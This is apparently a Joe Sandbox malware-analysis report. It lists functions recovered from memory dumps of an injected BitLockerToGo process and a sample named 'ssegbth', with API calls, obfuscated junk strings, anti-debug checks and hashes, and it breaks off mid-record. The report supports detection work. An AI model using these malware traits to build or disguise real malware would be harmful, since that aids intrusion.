Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: Object$DeleteMetricsSelectSystem
String ID:
API String ID: 3911056724-3916222277
Opcode ID: 343bd9b082ab3fff586494a94b3af2bca1b98f21081ecefa51810e52c3ef61b0
Instruction ID: 32b4f77fb47ac5df4ac5e78a14f03a1672a514edb7586eaebd1b7546cce91f9e
Opcode Fuzzy Hash: 343bd9b082ab3fff586494a94b3af2bca1b98f21081ecefa51810e52c3ef61b0
Instruction Fuzzy Hash: 6A914AB4605B008FD364EF29D985A16BBF1FB89700F108A6DE89AC7B60D730B844CF52

Function 00E50970 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 120COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00E5097A
VariantInit.OLEAUT32 ref: 00E5098D

Strings

5, xrefs: 00E509D3
1, xrefs: 00E509B3
3, xrefs: 00E509C3
7, xrefs: 00E509E3

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID: 1$3$5$7
API String ID: 2610073882-2908860245
Opcode ID: 28bbfb775dcc8640f33b4adbff7745e9f3d52b487b41b32e800e5830da13d01b
Instruction ID: fbbfac2892dff2bc92fc709577ddb8ea8cd746a579d653625cfdcfad7f2d0413
Opcode Fuzzy Hash: 28bbfb775dcc8640f33b4adbff7745e9f3d52b487b41b32e800e5830da13d01b
Instruction Fuzzy Hash: A4519D7260C7C28AD335CB3C84447EABBD16BE6324F094A6DD4ED87392D6B41446C753

Function 00E50658 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 102COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00E50683

Strings

&, xrefs: 00E50701
., xrefs: 00E50741
", xrefs: 00E50721

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: InitVariant
String ID: "$&$.
API String ID: 1927566239-1133339947
Opcode ID: 9441c156837d7039ae6acecbe791774ad1c20a5961e2e3c5ef73d24508206097
Instruction ID: 97b323ad00da274d826f58a965b8f460b999627df628f179115d389a9a6ebe49
Opcode Fuzzy Hash: 9441c156837d7039ae6acecbe791774ad1c20a5961e2e3c5ef73d24508206097
Instruction Fuzzy Hash: 0F51E67150C7C18AD3369B3888487CBBEE26BD6324F488A9DE1E94B3E6D7754106CB53

Analysis Process: ssegbthPID: 3396, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.1%
Total number of Nodes:	1774
Total number of Limit Nodes:	15

Executed Functions

Function 00423920 Relevance: 79.0, APIs: 37, Strings: 8, Instructions: 242
timelibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDriveStringsW.KERNEL32(00000000,00000000,?,?,00000001), ref: 0042399E
DeleteVolumeMountPointW.KERNEL32(00000000,?,?,00000001), ref: 004239A5
GetCommandLineA.KERNEL32(?,?,00000001), ref: 004239AB
lstrcatW.KERNEL32(?,00000000), ref: 004239D0
InterlockedExchange.KERNEL32(?,00000000), ref: 004239DC
GetActiveWindow.USER32 ref: 004239E2
TryEnterCriticalSection.KERNEL32(?,?,?,00000001), ref: 004239ED
WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,00000001), ref: 00423A03
IntersectRect.USER32(?,?,00000000), ref: 00423A14
DebugActiveProcessStop.KERNEL32(00000000,?,?,00000001), ref: 00423A1B
GetAtomNameW.KERNEL32(00000000,00000000,00000000), ref: 00423A24
GlobalDeleteAtom.KERNEL32(00000000), ref: 00423A2B
GetTimeZoneInformation.KERNEL32(?,?,?,00000001), ref: 00423A39
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00423A41
_memset.LIBCMT ref: 00423A53
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00423A62
DebugBreak.KERNEL32(?,?,00000001), ref: 00423A68
EnumDateFormatsW.KERNEL32(00000000,00000000,00000000,?,?,00000001), ref: 00423A71
LoadLibraryA.KERNEL32(00000000,?,?,00000001), ref: 00423A87
LoadLibraryA.KERNEL32(emuritowuwep,?,?,00000001), ref: 00423A8E
SetCommMask.KERNELBASE(00000000,00000000,?,?,00000001), ref: 00423AA2
GetTickCount.KERNEL32 ref: 00423AA8
GetSystemTimes.KERNEL32(?,?,?,?,?,00000001), ref: 00423ABD
FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000001), ref: 00423AE3
OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000001), ref: 00423B05
CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00423B0E
FormatMessageW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,00000001), ref: 00423B22
_printf.LIBCMT ref: 00423B3F
_malloc.LIBCMT ref: 00423B45
__vswprintf.LIBCMT ref: 00423B5B
_calloc.LIBCMT ref: 00423B68
_printf.LIBCMT ref: 00423B74
_calloc.LIBCMT ref: 00423B80
_fgetpos.LIBCMT ref: 00423B8A
_calloc.LIBCMT ref: 00423B91
GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 00423BA0
LoadLibraryA.KERNEL32(msimg32.dll,?,?,00000001), ref: 00423BE3

Strings

}$, xrefs: 00423C07
Pev, xrefs: 00423B35
msimg32.dll, xrefs: 00423BDE
emuritowuwep, xrefs: 00423A89
%s %f %c, xrefs: 00423B3A
0 %f, xrefs: 00423B50
k`, xrefs: 00423BFA
%s %c, xrefs: 00423B6E

Memory Dump Source

Source File: 0000000A.00000002.4165533088.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4165487896.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165533088.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165591163.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165617350.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165644994.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ssegbth.jbxd

Similarity

API ID: LibraryLoad_calloc$ActiveAtomCommDebugDeleteGlobalNameTimerWaitable_printf$AllocBreakCommandComputerConfigConsoleCountCreateCriticalDateDefaultDriveEnterEnumExchangeFoldFormatFormatsInformationInterlockedIntersectLineLogicalMaskMessageMountOpenPointProcessRectSectionStopStringStringsSystemTickTimeTimesVolumeWindowWriteZone__vswprintf_fgetpos_malloc_memsetlstrcat
String ID: %s %c$%s %f %c$0 %f$Pev$emuritowuwep$k`$msimg32.dll$}$
API String ID: 2066871035-2004584847
Opcode ID: a50c017afbb44dce2312e66fd6c7031cd371f5823ed2083de144182768161f8f
Instruction ID: 651746614786403ae795aaf106f979abae7fecea218118d0f79c0c36b77b1f99
Opcode Fuzzy Hash: a50c017afbb44dce2312e66fd6c7031cd371f5823ed2083de144182768161f8f
Instruction Fuzzy Hash: 25719272606530AFC221AF61EC4DD9F3B6CEF46355B80043AF58592161DB3C5646CBAE

Function 00401440 Relevance: 21.1, APIs: 14, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_fast_error_exit.LIBCMT ref: 0040148B
__mtinit.LIBCMT ref: 00401491
_fast_error_exit.LIBCMT ref: 0040149C
__RTC_Initialize.LIBCMT ref: 004014A2
__ioinit.LIBCMT ref: 004014AA
__amsg_exit.LIBCMT ref: 004014B5
GetCommandLineW.KERNEL32 ref: 004014BB
__wsetargv.LIBCMT ref: 004014CF
__amsg_exit.LIBCMT ref: 004014DA
__wsetenvp.LIBCMT ref: 004014E0
__amsg_exit.LIBCMT ref: 004014EB
__cinit.LIBCMT ref: 004014F2
__amsg_exit.LIBCMT ref: 004014FD
__wwincmdln.LIBCMT ref: 00401503

Memory Dump Source

Source File: 0000000A.00000002.4165533088.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4165487896.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165533088.0000000000416000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165591163.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165617350.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165644994.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ssegbth.jbxd

Similarity

API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
String ID:
API String ID: 2477803136-0
Opcode ID: 88912623073017b125c8b18556bc94b3c1c04a2bb6a41ac37540e3d82a68ecba
Instruction ID: 7d775fecba60b5cb55dbf909eabe49f747dd9621a0633fd0d2bd5281aad1b2ce
Opcode Fuzzy Hash: 88912623073017b125c8b18556bc94b3c1c04a2bb6a41ac37540e3d82a68ecba
Instruction Fuzzy Hash: CF2197B0900305A9DB247FB2A886B6E2668AF4075DF50493FF9057A1E2EB7C89409B5D

Function 004026AF Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004026C4

Memory Dump Source

Source File: 0000000A.00000002.4165533088.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4165487896.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165533088.0000000000416000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165591163.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165617350.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165644994.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ssegbth.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 0424be9681e0e56db8e37706a668e3c200d66d845ae62a5aa52bb3d6063d230d
Instruction ID: 4b4ce8b62f9c3be508ea66b989d73b6061d7fdeb7a15ca857a58faccdf78ae63
Opcode Fuzzy Hash: 0424be9681e0e56db8e37706a668e3c200d66d845ae62a5aa52bb3d6063d230d
Instruction Fuzzy Hash: D7D05E32A543089BDB105F706C097633BECD384795F544436B90DC6690E6B4D9918588

Non-executed Functions

Function 00401006 Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 00401653
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00401668
UnhandledExceptionFilter.KERNEL32(004271E0), ref: 00401673
GetCurrentProcess.KERNEL32(C0000409), ref: 0040168F
TerminateProcess.KERNEL32(00000000), ref: 00401696

Memory Dump Source

Source File: 0000000A.00000002.4165533088.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4165487896.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165533088.0000000000416000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165591163.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165617350.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165644994.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ssegbth.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: d5fe470e44ce5f7f528ad9339df5a5f2f4c585a15928b08a25921d4a2a5a6b09
Instruction ID: 824123d5e3cd5fba26b156f8f396cb5c9432919fc78e99a8dc8de2703bcac8e4
Opcode Fuzzy Hash: d5fe470e44ce5f7f528ad9339df5a5f2f4c585a15928b08a25921d4a2a5a6b09
Instruction Fuzzy Hash: 5B21C0786042089FC720DF26FD45A443BA0FB08315FD0447AE90897BB4EBB569868F8D

Function 004237C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNumaHighestNodeNumber.KERNEL32(00000000,00000000,?), ref: 004237F0
GetNumaHighestNodeNumber.KERNEL32(00000000,?,00000000,?), ref: 0042382E
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00423834
OpenJobObjectW.KERNEL32(00000000,00000000,00000000), ref: 0042383D
GetShortPathNameA.KERNEL32(00000000,?,00000000), ref: 0042384C
Sleep.KERNEL32(00000000), ref: 00423853

Strings

-, xrefs: 00423868

Memory Dump Source

Source File: 0000000A.00000002.4165533088.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4165487896.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165533088.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165591163.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165617350.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165644994.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ssegbth.jbxd

Similarity

API ID: HighestNodeNumaNumber$CalendarInfoNameObjectOpenPathShortSleep
String ID: -
API String ID: 2970987874-2547889144
Opcode ID: d448f583a707f12ca22d0fab55d9b3d910bad987a23ed2dc1694d9198582bdce
Instruction ID: 5a24bc0650528eea3c32b47b4a62c7c0ce5515a05f11029debdc5be1182a44fc
Opcode Fuzzy Hash: d448f583a707f12ca22d0fab55d9b3d910bad987a23ed2dc1694d9198582bdce
Instruction Fuzzy Hash: 9C2196B1A00128EBCB219F15EC84DAF77B8FB85715F4080ADF659A7141C7384A86CF6D

Function 0042388D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFullPathNameA.KERNEL32(vobarigawekowoxilinifur,00000000,?,00000000,00000000,00000000,00000001), ref: 004238C7
FreeEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000001), ref: 004238E1
HeapCreate.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004238FF
SetFileShortNameA.KERNEL32(00000000,ximawazudikahefafopoporifozib kadamuzayecep hizujajugejusawaharidam wunoguzazapeguvecazageganuzi), ref: 0042390B

Strings

ximawazudikahefafopoporifozib kadamuzayecep hizujajugejusawaharidam wunoguzazapeguvecazageganuzi, xrefs: 00423905
vobarigawekowoxilinifur, xrefs: 004238C2

Memory Dump Source

Source File: 0000000A.00000002.4165533088.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4165487896.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165533088.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165591163.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165617350.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165644994.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ssegbth.jbxd

Similarity

API ID: Name$CreateEnvironmentFileFreeFullHeapPathShortStrings
String ID: vobarigawekowoxilinifur$ximawazudikahefafopoporifozib kadamuzayecep hizujajugejusawaharidam wunoguzazapeguvecazageganuzi
API String ID: 4071102102-3876065148
Opcode ID: 5daad8be31327ba368c1f0b09219c535146e276f9a08458ccc16dd475f046dcc
Instruction ID: 54a63d936d2bb86c8b969f01a833e19422160a2cc5764942cb2e449c65f369aa
Opcode Fuzzy Hash: 5daad8be31327ba368c1f0b09219c535146e276f9a08458ccc16dd475f046dcc
Instruction Fuzzy Hash: E7015271304114AFDB20AB69FC49D6B73BCE785716B80003AF501D3151DA7C59468B6E

Function 00405EE0 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 00405EEC

Part of subcall function 00404EBA: __getptd_noexit.LIBCMT ref: 00404EBD
Part of subcall function 00404EBA: __amsg_exit.LIBCMT ref: 00404ECA

__amsg_exit.LIBCMT ref: 00405F0C
__lock.LIBCMT ref: 00405F1C
InterlockedDecrement.KERNEL32(?), ref: 00405F39
InterlockedIncrement.KERNEL32(022317F0), ref: 00405F64

Memory Dump Source

Source File: 0000000A.00000002.4165533088.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4165487896.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165533088.0000000000416000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165591163.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165617350.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165644994.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ssegbth.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: d579b097bb07bb80bfe6ba3dd5ef25fc4b9c964e24e36703bfc8fac40c7a8120
Instruction ID: 037dd45753388da9a6ba6f4d5d1560d43a0c66049b6a12658cf2eed9eeb4f939
Opcode Fuzzy Hash: d579b097bb07bb80bfe6ba3dd5ef25fc4b9c964e24e36703bfc8fac40c7a8120
Instruction Fuzzy Hash: B6015A31A01A22DBCA21AB66980675F7760FF00715F58413BE804B76D0CB3C5952CEDE

Function 004010AD Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 004010CB

Part of subcall function 0040285B: __mtinitlocknum.LIBCMT ref: 00402871
Part of subcall function 0040285B: __amsg_exit.LIBCMT ref: 0040287D
Part of subcall function 0040285B: EnterCriticalSection.KERNEL32(0040265C,0040265C,?,004035BD,00000004,00428678,0000000C,0040673E,0040102A,0040266B,00000000,00000000,00000000,?,00404E6C,00000001), ref: 00402885

___sbh_find_block.LIBCMT ref: 004010D6
___sbh_free_block.LIBCMT ref: 004010E5
HeapFree.KERNEL32(00000000,0040102A,004285D0,0000000C,0040283C,00000000,00428658,0000000C,00402876,0040102A,0040265C,?,004035BD,00000004,00428678,0000000C), ref: 00401115
GetLastError.KERNEL32(?,004035BD,00000004,00428678,0000000C,0040673E,0040102A,0040266B,00000000,00000000,00000000,?,00404E6C,00000001,00000214), ref: 00401126

Memory Dump Source

Source File: 0000000A.00000002.4165533088.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4165487896.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165533088.0000000000416000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165591163.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165617350.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165644994.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ssegbth.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: ac3cdb5ef712f5e2c6bfdabf719225ba94cfa5c8522ce385e5ecf7a088a9305e
Instruction ID: a03dd47e1bb948442bef399ff7ae859af71b5c6507b5a4564c4deb591aec34de
Opcode Fuzzy Hash: ac3cdb5ef712f5e2c6bfdabf719225ba94cfa5c8522ce385e5ecf7a088a9305e
Instruction Fuzzy Hash: 1A018431901211EADB357BB2A90EB4F3A649F04B15F10413FF654BA1E1DA7C85418A9D

Function 0042481F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00423CC7), ref: 00424824
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00424834

Strings

KERNEL32, xrefs: 0042481F
IsProcessorFeaturePresent, xrefs: 0042482E

Memory Dump Source

Source File: 0000000A.00000002.4165533088.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4165487896.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165533088.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165591163.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165617350.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165644994.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ssegbth.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: d6206f5bacf0bda3c6726ad4ab58d83909cfa4b15a03c5bd2a57e13f394b58d8
Instruction ID: 0787000e6f078e05b7749b2387166b7690ef8abe8e72a99b6b433a12ff955296
Opcode Fuzzy Hash: d6206f5bacf0bda3c6726ad4ab58d83909cfa4b15a03c5bd2a57e13f394b58d8
Instruction Fuzzy Hash: 11F09030B00A1AE2DF102BA0BC0A26F7B78FFC0705FE201A5D191A11C5EF7481B6C24E

Function 0040829E Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004082D2
__isleadbyte_l.LIBCMT ref: 00408306
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00408337
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?,?,?,00000000), ref: 004083A5

Memory Dump Source

Source File: 0000000A.00000002.4165533088.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4165487896.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165533088.0000000000416000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165591163.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165617350.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165644994.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ssegbth.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 57784c86470ed8ff91c809e530559af945dd142c3226e4a84c623129bcb00e67
Instruction ID: 2131b2d15cd432383d47f6c14abb9ff0fc8b04249a1240ce69537125248ea617
Opcode Fuzzy Hash: 57784c86470ed8ff91c809e530559af945dd142c3226e4a84c623129bcb00e67
Instruction Fuzzy Hash: 1A31D331A10245EFCB20DFA8C9849BE3BA5BF01310F1585BEE491AB2D1DB35DD50DB58

Function 0042470B Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__cftof_l.LIBCMT ref: 00424731

Part of subcall function 00424556: __fltout2.LIBCMT ref: 00424582

__cftog_l.LIBCMT ref: 00424757
__cftoe_l.LIBCMT ref: 00424789

Memory Dump Source

Source File: 0000000A.00000002.4165533088.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4165487896.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165533088.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165591163.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165617350.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165644994.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ssegbth.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 29c8883dd3ed5d8ab0f45916fb4b7f0a01db229a1e75b3cb984d75e26a57ebf3
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 7511723210006DBBCF125F84EC41CEE3F26FB99354B998516FE2859131C33AC9B1AB85

Function 0040664C Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 00406658

Part of subcall function 00404EBA: __getptd_noexit.LIBCMT ref: 00404EBD
Part of subcall function 00404EBA: __amsg_exit.LIBCMT ref: 00404ECA

__getptd.LIBCMT ref: 0040666F
__amsg_exit.LIBCMT ref: 0040667D
__lock.LIBCMT ref: 0040668D

Memory Dump Source

Source File: 0000000A.00000002.4165533088.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4165487896.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165533088.0000000000416000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165591163.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165617350.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165644994.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ssegbth.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: cf28f86c3e69b67fcb68b5548a1421e56ff4099ac1811fbe947641579d32eb42
Instruction ID: bb920493108befbff8734486010ebb8a0fa33931541f94aeff89b046a47bad2a
Opcode Fuzzy Hash: cf28f86c3e69b67fcb68b5548a1421e56ff4099ac1811fbe947641579d32eb42
Instruction Fuzzy Hash: 0BF06231900610CFD620BBB6C40674E77A06B40719F124A3FE805B73D1CB3D59118A9E

Function 00423632 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(0043A3B0,00000000,?,?,00423BEE), ref: 004236FE
GetProcAddress.KERNEL32(00000000,0042C638), ref: 0042373B

Strings

, xrefs: 00423684

Memory Dump Source

Source File: 0000000A.00000002.4165533088.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4165487896.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165533088.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165591163.0000000000427000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165617350.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.4165644994.000000000043D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ssegbth.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID:
API String ID: 1646373207-3916222277
Opcode ID: e0e411ff4c247a5316448fc5701780ceddf569871ef39cf7942b1ea1165f1dde
Instruction ID: bdfdf514c03e345525c3e16444427038d7ddc4cf5038b4f5b94db7108e4316be
